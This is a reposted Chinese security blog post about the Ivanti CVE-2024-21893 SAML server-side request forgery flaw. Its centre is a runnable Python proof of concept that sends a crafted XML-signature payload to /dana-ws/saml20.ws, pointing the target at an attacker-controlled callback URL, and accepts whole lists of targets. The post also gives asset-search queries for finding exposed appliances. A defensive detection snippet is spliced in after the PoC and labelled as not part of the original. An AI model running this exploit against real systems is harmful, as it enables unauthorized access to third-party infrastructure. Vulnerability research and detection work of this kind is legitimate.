Detection Tool for the Privilege Escalation Vulnerability CVE-2024-21893

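admin, February 4, 2024, 21:53:12
0x01 Tool Introduction

[February 1, 2024] Ivanti disclosed two [high-severity vulnerabilities]: CVE-2024-21888 / CVE-2024-21893, which carry a privilege escalation risk; Threatbook supports querying for the affected components.

[Impact]: CVE-2024-21888 is a privilege escalation vulnerability in the web component that allows a user to elevate their privileges to those of an administrator.

CVE-2024-21893 is a server-side request forgery vulnerability in the SAML component that allows an attacker to access certain restricted resources without authentication.

0x02 Installation and Usage

1. [Patch link]: https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US

2. [Threatbook query syntax]: app="Ivanti-Connect-Secure"     app="Ivanti-Policy-Secure"

3. Using the tool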

run python CVE-2024-21893.py -u target.com -a http://xxxxxxxxx.oastify.com


0x03 Code:
import argparse
from urllib.parse import urlparse

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# The request below is sent with verify=False, so silence the resulting TLS warning.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def ensure_http(url):
    if not url.startswith("http://") and not url.startswith("https://"):
        return f"https://{url}"
    return url

def send_poc(target_url, attacker_server):
    payload_template = """<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
            <ds:SignedInfo>
                <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
                <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
            </ds:SignedInfo>
            <ds:SignatureValue>qwerty</ds:SignatureValue>
            <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig#" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
                <ds:RetrievalMethod URI="{attacker_server}"/>
                <ds:X509Data/>
            </ds:KeyInfo>
            <ds:Object></ds:Object>
        </ds:Signature>
    </soap:Body>
</soap:Envelope>"""

    target_url = ensure_http(target_url)
    payload = payload_template.format(attacker_server=attacker_server)

    parsed_url = urlparse(target_url)
    full_path = parsed_url.path if parsed_url.path else "/dana-ws/saml20.ws"
    host = parsed_url.netloc

    headers = {
        "Content-Type": "text/xml",
        "User-Agent": "curl/8.4.0",
        "Accept": "*/*",
        "Connection": "close",
        "Content-Length": str(len(payload))
    }

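    print(f"Sending PoC to {target_url}...")

    # The HTTP response is not inspected; the timeout keeps an unresponsive host from hanging the run.
    requests.post(f"{parsed_url.scheme}://{host}{full_path}", data=payload, headers=headers, verify=False, timeout=10)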

def main():
    parser = argparse.ArgumentParser(description='Send PoC to a target or targets from a list.')
    parser.add_argument('-u', '--url', type=str, help='Single target URL')
    parser.add_argument('-l', '--list', type=str, help='File path for a list of target URLs')
    parser.add_argument('-a', type=str, required=True, help='Attacker server URL')
    args = parser.parse_args()

    if args.url:
        send_poc(args.url, args.a)
    elif args.list:
        with open(args.list, 'r') as file:
            for line in file:
                target = line.strip()
                if target:
                    send_poc(target, args.a)
    else:
        print("No target specified. Use -u for a single target or -l for a list of targets.")

if __name__ == "__main__":
    main()
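
A defensive counterpart to the PoC above, as an added example that is not part of the original post or the tool: it triages a captured POST to /dana-ws/saml20.ws and flags any ds:RetrievalMethod URI that points outside the document. The function names, verdict labels and sample bodies are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

DS_NS = "http://www.w3.org/2000/09/xmldsig#"
SAML_WS_PATH = "/dana-ws/saml20.ws"  # endpoint the PoC on this page posts to


def remote_retrieval_uris(body: bytes) -> list:
    """Return every ds:RetrievalMethod URI that points outside the document."""
    # Refuse DTDs before parsing so entity tricks never reach the XML parser.
    if b"<!DOCTYPE" in body or b"<!ENTITY" in body:
        raise ValueError("DTD not allowed in SOAP body")
    root = ET.fromstring(body)
    hits = []
    for node in root.iter(f"{{{DS_NS}}}RetrievalMethod"):
        uri = node.get("URI", "")
        # "#id" and "" are same-document references; a scheme means a fetch.
        if urlparse(uri).scheme:
            hits.append(uri)
    return hits


def triage(method: str, path: str, body: bytes) -> dict:
    """Classify one captured request; returns a verdict and the evidence."""
    if method.upper() != "POST" or path.split("?")[0] != SAML_WS_PATH:
        return {"verdict": "ignore", "uris": []}
    try:
        uris = remote_retrieval_uris(body)
    except (ET.ParseError, ValueError) as exc:
        return {"verdict": "review", "uris": [], "reason": str(exc)}
    return {"verdict": "alert" if uris else "ok", "uris": uris}


# Constructed sample bodies (not captured traffic); collector.example is a placeholder.
SUSPICIOUS = b"""<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:KeyInfo><ds:RetrievalMethod URI="http://collector.example/x"/></ds:KeyInfo>
</ds:Signature></soap:Body></soap:Envelope>"""
BENIGN = SUSPICIOUS.replace(b"http://collector.example/x", b"#key-1")

if __name__ == "__main__":
    for name, body in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, triage("POST", SAML_WS_PATH, body))
```

A "review" verdict means the body could not be parsed safely and should be examined by hand rather than treated as clean.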

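Originally published on the WeChat official account Web安全工具库: Detection Tool for the Privilege Escalation Vulnerability CVE-2024-21893 (updated February 3)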

 

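  • Published on February 4, 2024, 21:53:12
  • When reposting, please keep the link to this article (CN-SEC中文网: thanks to the original author for their hard work):
                   Detection Tool for the Privilege Escalation Vulnerability CVE-2024-21893 http://cn-sec.com/archives/2468249.html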
